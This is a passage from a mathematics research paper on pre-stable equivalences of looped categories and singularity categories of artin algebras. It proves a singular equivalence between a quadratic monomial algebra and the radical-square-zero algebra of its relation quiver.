The looped functor (F,δ) is called a pre-stable equivalence if it satisfies (S1)–(S3). The result implies that a pre-stable equivalence induces an equivalence between the stabilized categories.

Proof Write (D,Δ)=(S(C′,Ω′),Ω˜′) and F˜=S(F,δ). Write the composition (2.3) as (SF,∂). Then for an object X in C, the morphism ∂X:SFΩ(X)→Ω˜′SF(X) equals θFX◦S(δX). We make the following observation: for a morphism f:Ωl(X)→Ωl(Y) in C, the morphism ∂Yl◦SF(f)◦(∂Xl)−1 has a 0th representative δYl◦F(f)◦(δXl)−1.
We claim that, for each 1≤i≤3, the condition (Si) for (F,δ) is equivalent to the condition (i) in Lemma 2.1 for (SF,∂). Then we are done by Lemma 2.1. In what follows, we only prove that (Si) implies (i); by reversing the argument, we obtain the converse implication.

Assume that (S1) for (F,δ) holds. We take a morphism g:SF(X)=(FX,0)→SF(Y)=(FY,0) in D. We assume that g has a jth representative gj:Ω′jF(X)→Ω′jF(Y). Consider the morphism h:F(ΩjX)→F(ΩjY) given by h=(δYj)−1◦gj◦δXj. Then by (S1), there exist i≥0 and a morphism f:Ωi+j(X)→Ωi+j(Y) satisfying Ω′i(h)=(δΩjYi)◦F(f)◦(δΩjXi)−1. Then we have Δi+j(g)=∂Yi+j◦SF(f)◦(∂Xi+j)−1. Here, we use the observation above and the fact that Δi+j(g) has a 0th representative Ω′i(gj). Then we have (1) for (SF,∂).

Assume that (S2) for (F,δ) holds. We take two morphisms f,f′:X→Y in C with SF(f)=SF(f′). Then there exists j≥0 such that Ω′jF(f)=Ω′jF(f′). Using the natural isomorphism δj, we infer that FΩj(f)=FΩj(f′). By (S2), there exists i≥0 such that Ωi+j(f)=Ωi+j(f′), proving (2) for (SF,∂).

Assume that (S3) for (F,δ) holds. We take any object (C′,n) in (D,Δ). We may assume that n≥0; otherwise, we use the isomorphism θC′−n:((Ω′)−n(C′),0)≃(C′,n). By (S3), there exist j≥0 and an object X in C satisfying Ω′j(C′)≃F(X). We observe that Δj+n(C′,n)=(C′,−j), which is isomorphic to SΩ′j(C′), which is further isomorphic to SF(X). Set i=j+n. Then we have the required isomorphism Δi(C′,n)≃SF(X) in (3) for (SF,∂). This completes the proof of the claim.□

We make an easy observation.

Corollary 2.3 Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Assume that F is fully faithful. Then (F,δ) is a pre-stable equivalence if and only if (S3) holds.

Proof By the fully-faithfulness of F, the conditions (S1) and (S2) hold trivially.
We just take i=0 in both the conditions.□ We say that two looped categories (C,Ω) and (C′,Ω′) are pre-stably quasi-equivalent provided that there exists a chain of looped categories (C,Ω)=(C1,Ω1),(C2,Ω2),…,(Cn,Ωn)=(C′,Ω′) (2.4) such that for each 1≤i≤n−1, there exists a pre-stable equivalence from (Ci,Ωi) to (Ci+1,Ωi+1), or a pre-stable equivalence from (Ci+1,Ωi+1) to (Ci,Ωi). We have the following immediate consequence of Proposition 2.2. Corollary 2.4 Let (C,Ω)and (C′,Ω′)be two looped categories which are pre-stably quasi-equivalent. Then there is a looped functor (S(C,Ω),Ω˜)⟶∼(S(C′,Ω′),Ω˜′),which is an equivalence.□ Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. A full subcategory X⊆C is said to be saturated provided that the following conditions are satisfied: (Sa1) For each object X in C, there is a morphism ηX:X→G(X) with G(X) in X such that F(ηX) is an isomorphism and that Ωd(ηX) is an isomorphism for some d≥0. (Sa2) For a morphism f:X→Y, there is a morphism G(f):G(X)→G(Y) with G(f)◦ηX=ηY◦f. (Sa3) The conditions (S1)–(S3) above hold by requiring that all the objects X,Y belong to X. Example 2.5 Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Assume that F has a right adjoint functor G, which is fully faithful. Assume further that the unit η:IdC→GF satisfies the following condition: for each object X, there exists d≥0 with Ωd(ηX) an isomorphism. Take X to be the essential image of G. We claim that X⊆C is a saturated subcategory. Indeed, the restriction F∣X:X→C′ is an equivalence. Then (Sa3) holds trivially, by taking i to be zero in (S1)–(S3). The conditions (Sa1) and (Sa2) are immediate from the assumption. Here, we use the well-known fact that F(η) is a natural isomorphism, since G is fully faithful. Lemma 2.6 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor, and X⊆Ca saturated subcategory. Then the conditions (S1)–(S3) hold, that is, the functor (F,δ)is a pre-stable equivalence. Proof It suffices to verify (S1) and (S2). For (S1), take any morphism g:F(X)→F(Y) in C′. 
Consider g′=F(ηY)◦g◦F(ηX)−1:FG(X)→FG(Y). Then by (Sa3), there exist i≥0 and f′:Ωi(GX)→Ωi(GY) with Ω′i(g′)=δGYi◦F(f′)◦(δGXi)−1. We may assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Take f=(Ωi(ηY))−1◦f′◦Ωi(ηX), which is the required morphism in (S1). Let f,f′:X→Y be morphisms with F(f)=F(f′). Applying (Sa2) and using the isomorphisms F(ηX) and F(ηY), we have FG(f)=FG(f′). By (Sa3), we have ΩiG(f)=ΩiG(f′) for some i≥0. We assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Then we infer from (Sa2) that Ωi(f)=Ωi(f′). We are done with (S2).□ We will specialize the consideration to left triangulated categories. A looped category (C,Ω) is additive provided that C is an additive category and the loop functor Ω is an additive functor. We recall that a left triangulated category (C,Ω,E) consists of an additive looped category (C,Ω) and a class E of left triangles in C satisfying certain axioms, which are analogous to those for a triangulated category, but the endofunctor Ω is possibly not an auto-equivalence. The following convention is usual. We call a left triangulated category (C,Ω,E) a triangulated category, provided that the category (C,Ω) is stable, that is, the endofunctor Ω is an auto-equivalence. In this case, the translation functor Σ of C is a quasi-inverse of Ω. Then this notion is equivalent to the original one of a triangulated category in the sense of Verdier. For details, we refer to [5] and compare [21]. In what follows, we write C for the left triangulated category (C,Ω,E). A looped functor (F,δ) between two left triangulated categories C and C′=(C′,Ω′,E′) is called a triangle functor if F is an additive functor and sends left triangles to left triangles. We sometimes suppress the natural isomorphism δ and simply denote the triangle functor by F. A triangle functor which is a pre-stable equivalence is called a pre-triangle equivalence. 
Two left triangulated categories C and C′ are pre-triangle quasi-equivalent if they are pre-stably quasi-equivalent such that all the categories in (2.4) are left triangulated and all the pre-stable equivalences connecting them are pre-triangle equivalences. For a left triangulated category C=(C,Ω,E), the stabilized category S(C)≔(S(C,Ω),Ω˜,E˜) is a triangulated category, where the translation functor Σ=(Ω˜)−1 and the triangles in E˜ are induced by the left triangles in E; see [4, Section 3]. Corollary 2.7 Let Cand C′be two left triangulated categories which are pre-triangle quasi-equivalent. Then there is a triangle equivalence S(C)→∼S(C′).□ 3. The singularity categories and singular equivalences In this section, we recall the notion of the singularity category of an algebra. We shall show that for two algebras whose stable module categories are pre-triangle quasi-equivalent, their singularity categories are triangle equivalent; see Proposition 3.2 and compare Proposition 3.6 below. Let k be a commutative artinian ring with a unit. We emphasize that all the functors and categories are required to be k-linear in this section. Let A be an artin k-algebra. We denote by A-mod the category of finitely generated left A-modules, and by A-proj the full subcategory consisting of projective modules. We denote by A-mod̲ the stable category of A-mod modulo projective modules [3, p. 104]. The morphism space Hom̲A(M,N) of two modules M and N in A-mod̲ is defined to be HomA(M,N)/p(M,N), where p(M,N) denotes the k-submodule formed by morphisms that factor through projective modules. For a morphism f:M→N, we write f¯ for its image in Hom̲A(M,N). Recall that for an A-module M, its syzygy ΩA(M) is the kernel of its projective cover P(M)→pMM. We fix for M a short exact sequence 0→ΩA(M)→iMP(M)→pMM→0. This gives rise to the syzygy functor ΩA:A-mod̲→A-mod̲; see [3, p. 124]. 
Indeed, A-mod̲≔(A-mod̲,ΩA,EA) is a left triangulated category, where EA consists of left triangles that are induced from short exact sequences in A-mod. More precisely, given a short exact sequence 0→X→fY→gZ→0, we have a commutative diagram comparing the fixed projective cover sequence 0→ΩA(Z)→iZP(Z)→pZZ→0 with the given sequence: the vertical morphisms are some h:ΩA(Z)→X, a lift P(Z)→Y of pZ along g, and the identity of Z. Then ΩA(Z)→h¯X→f¯Y→g¯Z is a left triangle in EA. As recalled in Section 2, the stabilized category S(A-mod̲) is a triangulated category. There is a better-known description of this stabilized category as the singularity category; see [21]. To recall this, we denote by Db(A-mod) the bounded derived category of A-mod. We identify an A-module M with the corresponding stalk complex concentrated at degree zero, which is also denoted by M. Recall that a complex in Db(A-mod) is perfect provided that it is isomorphic to a bounded complex consisting of projective modules. The full subcategory consisting of perfect complexes is denoted by perf(A), which is a triangulated subcategory of Db(A-mod) and is closed under direct summands; see [7, Lemma 1.2.1]. Following [22], the singularity category of an algebra A is defined to be the Verdier quotient triangulated category Dsg(A)=Db(A-mod)/perf(A); compare [7, 15, 21]. We denote by q:Db(A-mod)→Dsg(A) the quotient functor. We denote a complex of A-modules by X•=(Xn,dn)n∈Z, where the Xn are A-modules and the differentials dn:Xn→Xn+1 are homomorphisms of modules satisfying dn+1◦dn=0. The translation functor Σ, both on Db(A-mod) and on Dsg(A), sends a complex X• to the complex Σ(X•) given by Σ(X)n=Xn+1 and dΣXn=−dXn+1. Consider the following functor: FA:A-mod̲⟶Dsg(A) sending a module M to the corresponding stalk complex concentrated at degree zero, and a morphism f¯ to q(f). Here, the well-definedness of FA on morphisms is due to the fact that a projective module is isomorphic to the zero object in Dsg(A). For an A-module M, we consider the two-term complex C(M)=⋯→0→P(M)→pMM→0→⋯ with P(M) at degree zero. Then we have a quasi-isomorphism iM:ΩA(M)→C(M).
The canonical inclusion canM:Σ−1(M)→C(M) becomes an isomorphism in Dsg(A). Then we have a natural isomorphism δM=q(canM)−1◦q(iM):FAΩA(M)⟶Σ−1FA(M). In other words, (FA,δ):(A-mod̲,ΩA)→(Dsg(A),Σ−1) is a looped functor. Indeed, FA is an additive functor and sends left triangles to (left) triangles. Then we have a triangle functor (FA,δ):A-mod̲⟶Dsg(A). Applying the universal property of the stabilization to (FA,δ), we obtain a strictly looped functor F˜A:S(A-mod̲)⟶Dsg(A), which is also a triangle functor; see [4, 3.1]. The following basic result is due to [21]. For a detailed proof, we refer to [4, Corollary 3.9]. Lemma 3.1 Keep the notation as above. Then F˜A:S(A-mod̲)→Dsg(A)is a triangle equivalence. By a singular equivalence between two algebras A and B, we mean a triangle equivalence between their singularity categories. Proposition 3.2 Let Aand Bbe two artin algebras. Assume that the stable categories A-mod̲and B-mod̲are pre-triangle quasi-equivalent. Then there is a singular equivalence between Aand B. Proof We just combine Lemma 3.1 and Corollary 2.7.□ In the following two examples, pre-triangle equivalences between stable module categories are explicitly given. We require that k acts centrally on any bimodules. Example 3.3 Let A and B′ be artin algebras, and let MB′A be an A- B′-bimodule. Consider the upper triangular matrix algebra B=(A0MB′). We recall that a left B-module is a column vector (XY), where XA and YB′ are a left A-module and a left B′-module with an A-module homomorphism ϕ:M⊗B′Y→X, respectively; compare [3, III]. We call ϕ the structure morphism of the B-module (XY). Consider the natural full embedding i:A-mod→B-mod, sending an A-module X to i(X)=(X0). Since i preserves projective modules and is exact, it commutes with taking the syzygies. Then we have the induced functor i:A-mod̲→B-mod̲, which is a triangle functor. We claim that the induced functor i is a pre-triangle equivalence if and only if the algebra B′ has finite global dimension. 
In this case, by Proposition 3.2, there is a triangle equivalence Dsg(A)→∼Dsg(B); compare [9, Theorem 4.1(1)]. Indeed, the induced functor i is fully faithful. By Corollary 2.3, we only need to consider the condition (S3). Then we are done by the following fact: for any B-module (XY) and d≥0, we have ΩBd(XY)=(X′ΩB′d(Y)) for some A-module X′. Hence, if ΩB′d(Y)=0, the B-module ΩBd(XY) lies in the essential image of i.

The following example is somewhat more difficult.

Example 3.4 Let A and B′ be artin algebras, and let NAB′ be an A-B′-bimodule. Consider the upper triangular matrix algebra B=(B′0NA). We assume that B′ has finite global dimension. Consider the natural projection functor p:B-mod→A-mod, sending a B-module (XY) to the A-module Y. It is an exact functor which sends projective modules to projective modules. Then we have the induced functor p:B-mod̲→A-mod̲, which is a triangle functor. For an A-module Y, (0Y) is naturally a B-module with the zero structure morphism N⊗AY→0. Take X to be the full subcategory of B-mod̲ consisting of modules of the form (0Y). We claim that X is a saturated subcategory of B-mod̲. Then by Lemma 2.6, the induced functor p is a pre-triangle equivalence. Therefore, by Proposition 3.2, there is a triangle equivalence Dsg(B)→∼Dsg(A); compare [9, Theorem 4.1(2)].

We now prove the claim. For a B-module C=(XY), we consider the projection ηC:(XY)→G(C)=(0Y). Since its kernel has finite projective dimension, it follows that ΩBd(ηC) is an isomorphism for d large enough. We observe that p(ηC) is an isomorphism. Then we have (Sa1). The conditions (Sa2) and (Sa3) are trivial. Here, for (S2) in X, we use the following fact: if a morphism f:Y→Y′ of A-modules factors through a projective A-module P, then the morphism (0f):(0Y)→(0Y′) of B-modules factors through (0P), which has finite projective dimension; consequently, we have ΩBd(0f)=0 for d large enough.

Let M be a left A-module. Then M*=HomA(M,A) is a right A-module.
Recall that an A-module M is Gorenstein-projective provided that there is an acyclic complex P• of projective A-modules such that the Hom-complex (P•)*=HomA(P•,A) is still acyclic and that M is isomorphic to a certain cocycle Zi(P•) of P•. We denote by A-Gproj the full subcategory of A-mod formed by Gorenstein-projective A-modules. We observe that A-proj⊆A-Gproj. We recall that the full subcategory A-Gproj⊆A-mod is closed under direct summands, kernels of epimorphisms and extensions; compare [2, (3.11)]. In particular, for a Gorenstein-projective A-module M all its syzygies ΩAi(M) are Gorenstein-projective. Since A-Gproj⊆A-mod is closed under extensions, it becomes naturally an exact category in the sense of Quillen [24]. Moreover, it is a Frobenius category, that is, it has enough (relatively) projective and enough (relatively) injective objects, and the class of projective objects coincides with the class of injective objects. In fact, the class of projective-injective objects in A-Gproj equals A-proj. For details, we compare [4, Proposition 2.13]. We denote by A-Gproj̲ the full subcategory of A-mod̲ consisting of Gorenstein-projective A-modules. Then the syzygy functor ΩA restricts to an auto-equivalence ΩA:A-Gproj̲→A-Gproj̲. Moreover, the stable category A-Gproj̲ becomes a triangulated category such that the translation functor is given by a quasi-inverse of ΩA, and that the triangles are induced by short exact sequences in A-Gproj. These are consequences of a general result in [14, Chapter I.2]. The inclusion functor inc:A-Gproj̲→A-mod̲ is a triangle functor between left triangulated categories. We consider the composite of triangle functors GA:A-Gproj̲⟶incA-mod̲⟶FADsg(A). Let M,N be Gorenstein-projective A-modules. By the fully-faithfulness of the functor ΩA:A-Gproj̲→A-Gproj̲, the natural map Hom̲A(M,N)⟶HomS(A-mod̲)(M,N) induced by the stabilization functor S:A-mod̲→S(A-mod̲) is an isomorphism. We identify S(A-mod̲) with Dsg(A) by Lemma 3.1. 
Then this isomorphism implies that the triangle functor GA is fully faithful; compare [7, Theorem 4.1] and [15, Theorem 4.6]. Recall from [7, 15] that an artin algebra A is Gorenstein if the regular module A has finite injective dimension on both sides. Indeed, the two injective dimensions are equal. We mention that a self-injective algebra is Gorenstein; over such an algebra, any module is Gorenstein-projective. The following result is also known. As a consequence, for a self-injective algebra A the stable module category A-mod̲ and Dsg(A) are triangle equivalent; see [21] and [25, Theorem 2.1].

Lemma 3.5 Let A be an artin algebra. Then the following statements are equivalent:

(1) The algebra A is Gorenstein.

(2) The inclusion functor inc:A-Gproj̲→A-mod̲ is a pre-triangle equivalence.

(3) The functor GA:A-Gproj̲→Dsg(A) is a triangle equivalence.

Proof Recall that A is Gorenstein if and only if for any module X, there exists d≥0 with ΩAd(X) Gorenstein-projective; see [18]. The inclusion functor in (2) is fully faithful. By Corollary 2.3, it is a pre-triangle equivalence if and only if the condition (S3) in A-mod̲ is satisfied. Then the equivalence ‘(1)⇔(2)’ follows.

Since ΩA:A-Gproj̲→A-Gproj̲ is an auto-equivalence, we identify A-Gproj̲ with its stabilization S(A-Gproj̲). By Lemma 3.1, we identify Dsg(A) with S(A-mod̲). Then the functor GA is identified with the stabilization of the inclusion functor in (2). Then the equivalence ‘(2)⇔(3)’ follows from Proposition 2.2.□

Recall from [6] that the Gorenstein defect category of an algebra A is defined to be the Verdier quotient triangulated category Ddef(A)=Dsg(A)/ImGA, where ImGA denotes the essential image of the fully faithful triangle functor GA, and thus is a triangulated subcategory of Dsg(A). By Lemma 3.5(3), the algebra A is Gorenstein if and only if Ddef(A) is trivial; see also [6]. The following observation suggests that pre-triangle equivalences are ubiquitous in the study of singular equivalences; compare Proposition 3.2.
Proposition 3.6 Let Aand Bbe artin algebras. Assume that Bis a Gorenstein algebra and that there is a singular equivalence between Aand B. Then there is a pre-triangle equivalence from A-mod̲to B-mod̲. Proof Using the triangle equivalence GB, we obtain a triangle equivalence H:Dsg(A)⟶B-Gproj̲. More precisely, we have H=GB−1L, where L:Dsg(A)→Dsg(B) is the assumed singular equivalence and GB−1 is a quasi-inverse of GB. Then we have the following composite of triangle functors: F:A-mod̲⟶FADsg(A)⟶HB-Gproj̲⟶incB-mod̲. We claim that F is a pre-triangle equivalence. Indeed, the functor FA is a pre-triangle equivalence by Lemma 3.1, where we identify Dsg(A) with its stabilization S(Dsg(A)). The inclusion functor is a pre-triangle equivalence by Lemma 3.5(2). Therefore, all the three functors above are pre-triangle equivalences. Then as their composition, so is the functor F.□ 4. The singularity category of a quadratic monomial algebra In this section, we study the singularity category of a quadratic monomial algebra A. We consider the algebra B with radical square zero that is defined by the relation quiver of A. The main result claims that there is a pre-triangle quasi-equivalence between the stable A-module category and the stable B-module category. Consequently, we obtain an explicit singular equivalence between A and B. For the ease of the reader, we recall some notation on quivers and quadratic monomial algebras. Let Q=(Q0,Q1;s,t) be a finite quiver, where Q0 is the set of vertices, Q1 the set of arrows, and s,t:Q1→Q0 are maps which assign to each arrow α its starting vertex s(α) and its terminating vertex t(α). A path p of length n in Q is a sequence p=αn⋯α2α1 of arrows such that s(αi)=t(αi−1) for 2≤i≤n; moreover, we define its starting vertex s(p)=s(α1) and its terminating vertex t(p)=t(αn). We observe that a path of length one is just an arrow. To each vertex i, we associate a trivial path ei of length zero, and set s(ei)=i=t(ei). 
For two paths p and q with s(p)=t(q), we write pq for their concatenation. By convention, we have p=pes(p)=et(p)p. For two paths p and q in Q, we say that q is a sub-path of p provided that p=p″qp′ for some paths p″ and p′. Let k be a field. The path algebra kQ of a finite quiver Q is defined as follows. As a k-vector space, it has a basis given by all the paths in Q. For two paths p and q, their multiplication is given by the concatenation pq if s(p)=t(q), and is zero otherwise. The unit of kQ equals ∑i∈Q0ei. Denote by J the two-sided ideal of kQ generated by arrows. Then Jd is spanned by all the paths of length at least d for each d≥2. A two-sided ideal I of kQ is admissible provided that Jd⊆I⊆J2 for some d≥2. In this case, the quotient algebra A=kQ/I is finite-dimensional. We recall that an admissible ideal I of kQ is quadratic monomial provided that it is generated by some paths of length two. In this case, the quotient algebra A=kQ/I is called a quadratic monomial algebra. Observe that the algebra A has radical square zero if and only if I=J2. We call kQ/J2 the algebra with radical square zero defined by the quiver Q. In what follows, A=kQ/I is a quadratic monomial algebra. We denote by F the set of paths of length two contained in I. Following [29], a path p in Q is non-zero in A provided that it does not belong to I, or equivalently, p does not contain a sub-path in F. In this case, we abuse notation and write p for the image p+I in A. The set of non-zero paths forms a k-basis for A. For a path p in I, we write p=0 in A. For a non-zero path p, we consider the left ideal Ap generated by p, which has a k-basis given by the non-zero paths q such that q=q′p for some path q′. We observe that for a vertex i, Aei is an indecomposable projective A-module. Then we have a projective cover πp:Aet(p)→Ap sending et(p) to p.

Lemma 4.1 Let A=kQ/I be a quadratic monomial algebra.
Then the following statements hold:

(1) For a non-zero path p=αp′ with α an arrow, there is an isomorphism Ap≃Aα of A-modules sending xp to xα for any path x with s(x)=t(p).

(2) For an arrow α, we have a short exact sequence of A-modules 0⟶⨁{β∈Q1∣βα∈F}Aβ⟶incAet(α)⟶παAα⟶0, (4.1) where ‘inc’ denotes the inclusion map.

(3) For any A-module M, there is an isomorphism ΩA2(M)≃⨁α∈Q1(Aα)nα for some integers nα.

Proof (1) is trivial and (2) is straightforward; compare the first paragraph in [29, p. 162]. In view of (1), the statement (3) is a special case of [29, Theorem I].□

Let α be an arrow such that the set {β∈Q1∣βα∈F} is non-empty. By (4.1), this is equivalent to the condition that the A-module Aα is non-projective. Denote by N(α)={α′∈Q1∣t(α′)=t(α), and βα′∈F for each arrow β satisfying βα∈F}. Set Z(α)=⨁α′∈N(α)α′A, which is the right ideal generated by N(α). We observe that α∈N(α). The second statement of the following result is analogous to [12, Lemma 2.3].

Lemma 4.2 Let α,α′ be two arrows. We assume that the set {β∈Q1∣βα∈F} is non-empty. Then we have the following statements:

(1) There is an isomorphism HomA(Aα,A)→Z(α) sending f to f(α).

(2) There is a k-linear isomorphism Hom̲A(Aα,Aα′)≃(Z(α)∩Aα′)/Z(α)α′. (4.2)

(3) If α′ does not belong to N(α), we have Hom̲A(Aα,Aα′)=0.

(4) If α′ belongs to N(α), there is a unique epimorphism π=πα,α′:Aα→Aα′ sending α to α′, and Hom̲A(Aα,Aα′)=kπ¯.

Proof We observe that Z(α) has a k-basis given by the non-zero paths q which satisfy t(q)=t(α) and βq=0 for each arrow β with βα∈F. Then we infer (1) by applying HomA(−,A) to (4.1) and using the canonical isomorphism HomA(Aet(α),A)≃et(α)A. For (2), for each left ideal K of A, we identify HomA(Aα,K) with the subspace of HomA(Aα,A) formed by those morphisms whose image is contained in K. Therefore, we identify HomA(Aα,Aα′) with Z(α)∩Aα′, and HomA(Aα,Aet(α′)) with Z(α)∩Aet(α′). Recall the projective cover πα′:Aet(α′)→Aα′. The subspace p(Aα,Aα′) formed by those morphisms factoring through projective modules equals the image of the map HomA(Aα,πα′).
This image is then identified with Z(α)α′. Then the required isomorphism follows. The statement (3) is an immediate consequence of (2), since in this case we have Z(α)∩Aα′=Z(α)α′. For (4), we observe in this case that Z(α)∩Aα′=(Z(α)α′)⊕kα′. It follows from (2) that Hom̲A(Aα,Aα′) is one dimensional. The existence of the surjective homomorphism π is by the isomorphism in (1), under which π corresponds to the element α′. Then we are done.□

Remark 4.3 Assume that α′∈N(α); in particular, t(α)=t(α′). Then we have a commutative diagram whose rows are the sequences (4.1) for α and for α′, whose middle vertical map is the identity of Aet(α)=Aet(α′), and whose outer vertical maps are the inclusion ⨁{β∈Q1∣βα∈F}Aβ→⨁{β∈Q1∣βα′∈F}Aβ and π=πα,α′, respectively. The leftmost inclusion uses the fact that α′∈N(α), and thus {β∈Q1∣βα∈F}⊆{β∈Q1∣βα′∈F}.

The following notion is taken from [12, Section 5]; compare [17].

Definition 4.4 Let A=kQ/I be a quadratic monomial algebra. Denote by F the set consisting of the paths in Q of length two that are contained in I. The relation quiver RA of A is defined as follows. Its vertices are given by the arrows in Q, and there is an arrow [βα] from α to β for each element βα in F. We will consider the algebra B=kRA/J2 with radical square zero defined by RA.

The main result of this paper is as follows.

Theorem 4.5 Let A=kQ/I be a quadratic monomial algebra, and let B=kRA/J2 be the algebra with radical square zero defined by the relation quiver of A. Then there is a pre-triangle quasi-equivalence connecting A-mod̲ and B-mod̲. Consequently, there is a singular equivalence between A and B.

For an arrow α in Q, we denote by Sα and Pα the simple B-module and the indecomposable projective B-module corresponding to the vertex α, respectively. We may identify Pα with Beα, where eα denotes the trivial path in RA at α. Hence, the B-module Pα has a k-basis {eα,[βα]∣βα∈F}. We observe the following short exact sequence of B-modules 0⟶⨁{β∈Q1∣βα∈F}Sβ⟶iαPα⟶Sα⟶0, (4.3) where iα identifies Sβ with the B-submodule k[βα]. We denote by B-ssmod̲ the full subcategory of B-mod̲ consisting of semisimple B-modules.
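Writing the two short exact sequences (4.1) and (4.3) side by side displays the matching that drives the comparison of A and B:

```latex
% (4.1) in A-mod and (4.3) in B-mod, over the same index set:
0 \longrightarrow \bigoplus_{\{\beta \in Q_1 \mid \beta\alpha \in F\}} A\beta
  \longrightarrow Ae_{t(\alpha)} \longrightarrow A\alpha \longrightarrow 0,
\\[6pt]
0 \longrightarrow \bigoplus_{\{\beta \in Q_1 \mid \beta\alpha \in F\}} S_\beta
  \longrightarrow P_\alpha \longrightarrow S_\alpha \longrightarrow 0.
```

In particular, ΩA(Aα) and ΩB(Sα) are direct sums over the same index set {β∈Q1∣βα∈F}; this is the computation behind Lemma 4.6 below.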
We observe that for any B-module M, the syzygy ΩB(M) is semisimple; compare [11, Lemma 2.1]. Moreover, any homomorphism f:X→Y between semisimple modules splits, that is, it is isomorphic to a homomorphism of the form 0⊕IdZ:K⊕Z→C⊕Z, vanishing on K and restricting to the identity on Z, for some B-modules K, C and Z. We infer that B-ssmod̲⊆B-mod̲ is a left triangulated subcategory. Moreover, all left triangles inside B-ssmod̲ are direct sums of trivial ones. There is a unique k-linear functor F:B-ssmod̲→A-mod̲ sending Sα to Aα for each arrow α in Q. Here, for the well-definedness of F, we use the following fact, which can be obtained by comparing (4.1) and (4.3): the simple B-module Sα is projective if and only if so is the A-module Aα. We have the following key observation.

Lemma 4.6 The functor F:B-ssmod̲→A-mod̲ is a pre-triangle equivalence.

Proof Let α be an arrow in Q. We observe that (4.1) and (4.3) compute the syzygy modules ΩA(Aα) and ΩB(Sα), respectively. It follows that the functor F commutes with the syzygy functors. In other words, there is a natural isomorphism δ:FΩB→ΩAF such that (F,δ) is a looped functor. Since all morphisms in B-ssmod̲ split, each left triangle inside is a direct sum of trivial ones. It follows that F respects left triangles, that is, (F,δ) is a triangle functor. We verify the conditions (S1)–(S3) in Proposition 2.2; then we are done.

Since the functor F is faithful, (S2) follows. The condition (S3) follows from Lemma 4.1(3). For (S1), we take a morphism g:F(X)→F(Y) in A-mod̲. Without loss of generality, we assume that both X and Y are indecomposable, in which case both are simple B-modules. We assume that X=Sα and Y=Sα′. We assume that g is non-zero; in particular, F(X)=Aα is non-projective, or equivalently, the set {β∈Q1∣βα∈F} is non-empty. Observe that F(Y)=Aα′. We apply Lemma 4.2(3) to infer that α′∈N(α). Write π=πα,α′. By Lemma 4.2(4), we may assume that g=π¯. The commutative diagram in Remark 4.3 implies that ΩA(g) equals the inclusion morphism ⨁{β∈Q1∣βα∈F}Aβ⟶⨁{β∈Q1∣βα′∈F}Aβ.
Take f to be the corresponding inclusion morphism ΩB(Sα)=⨁{β∈Q1∣βα∈F}Sβ⟶ΩB(Sα′)=⨁{β∈Q1∣βα′∈F}Sβ in B-ssmod̲. Then we identify F(f) with ΩA(g); more precisely, we have F(f)=δY◦ΩA(g)◦(δX)−1. This proves the condition (S1).□ We now prove Theorem 4.5. Proof of Theorem4.5. Consider the inclusion functor inc:B-ssmod̲→B-mod̲. As mentioned above, this is a triangle functor. Recall that the syzygy of any B-module is semisimple, that is, it lies in B-ssmod̲. Then the inclusion functor is a pre-triangle equivalence by Corollary 2.3. Recall the pre-triangle equivalence F:B-ssmod̲→A-mod̲ in Lemma 4.6. Then we have the required pre-triangle quasi-equivalence A-mod̲⟵FB-ssmod̲⟶incB-mod̲. The last statement follows from Proposition 3.2. We mention that by the explicit construction of the functor F, the resulting triangle equivalence Dsg(A)→Dsg(B) sends Aα to Sα for each arrow α in Q.□ Remark 4.7 We will observe in the proof of Proposition 5.3 below that the singular equivalence in Theorem 4.5 restricts to a triangle equivalence between A-Gproj̲ and B-Gproj̲. Consequently, it induces a triangle equivalence between Ddef(A) and Ddef(B). We emphasize that in general a singular equivalence will not induce a triangle equivalence between Gorenstein defect categories. 5. Consequences and examples In this section, we draw some consequences of Theorem 4.5 and describe some examples. We first make some preparation by recalling some known results on the singularity category of an algebra with radical square zero. For a finite quiver Q, we recall that a vertex in Q is a sink if there is no arrow starting at it. We denote by Q0 the quiver without sinks, that is obtained from Q by repeatedly removing sinks. The double quiver Q¯ of Q is obtained from Q by adding for each α∈Q1 a new arrow α* in the reverse direction, that is, s(α*)=t(α) and t(α*)=s(α). 
Recall that the Leavitt path algebra L(Q) of Q with coefficients in k is the quotient algebra of kQ¯ modulo the two-sided ideal generated by the following elements: {αβ*−δα,βet(α)∣α,β∈Q1}∪{∑{α∈Q1∣s(α)=i}α*α−ei∣i∈Q0 a non-sink}. Here, δ denotes the Kronecker symbol. Then L(Q) has a natural Z-grading given by deg ei=0, deg α=1 and deg α*=−1. We denote by L(Q)-grproj the category of finitely generated Z-graded projective left L(Q)-modules, and by (−1):L(Q)-grproj→L(Q)-grproj the degree-shift functor by degree −1. For details on Leavitt path algebras, we refer to [1, 13, 27]. We denote by kQ/J2 the algebra with radical square zero defined by Q. For n≥1, we denote by Zn the basic n-cycle, which is a connected quiver consisting of n vertices and n arrows forming an oriented cycle. Then the algebra kZn/J2 is self-injective. In particular, the stable module category kZn/J2-mod̲ is triangle equivalent to Dsg(kZn/J2). An abelian category A is semisimple if any short exact sequence splits. For example, if the quiver Q has no sinks, the category L(Q)-grproj is a semisimple abelian category; see [13, Lemma 4.1]. For a semisimple abelian category A and an auto-equivalence Σ on A, there is a unique triangulated structure on A with Σ the translation functor. Indeed, all triangles are direct sums of trivial ones. The resulting triangulated category is denoted by (A,Σ); see [10, Lemma 3.4]. As an example, we will consider the triangulated category (L(Q)-grproj,(−1)) for a quiver Q without sinks.

Example 5.1 Let kn=k×k×⋯×k be the product algebra of n copies of k. Consider the automorphism σ:kn→kn sending (a1,a2,…,an) to (a2,…,an,a1), which induces an automorphism σ*:kn-mod→kn-mod by twisting the kn-action on modules. We observe that there are triangle equivalences (kn-mod,σ*)⟶∼kZn/J2-mod̲⟶∼(L(Zn)-grproj,(−1)). The first equivalence is well known and the second one is a special case of [13, Theorem 6.1]. We will denote this triangulated category by Tn. Let Q be a finite quiver.
We call a connected component C of Q perfect (resp. acyclic) if it is a basic cycle (resp. if it has no oriented cycles). A connected component is defect if it is neither perfect nor acyclic. Then we have a disjoint union Q=Qperf∪Qac∪Qdef, where Qperf (resp. Qac, Qdef) is the union of all the perfect (resp. acyclic, defect) components in Q. Denote by B=kQ/J2. Then we have a decomposition of algebras B=Bperf×Bac×Bdef. We summarize the known results on the singularity category and the Gorenstein defect category of an algebra with radical square zero.

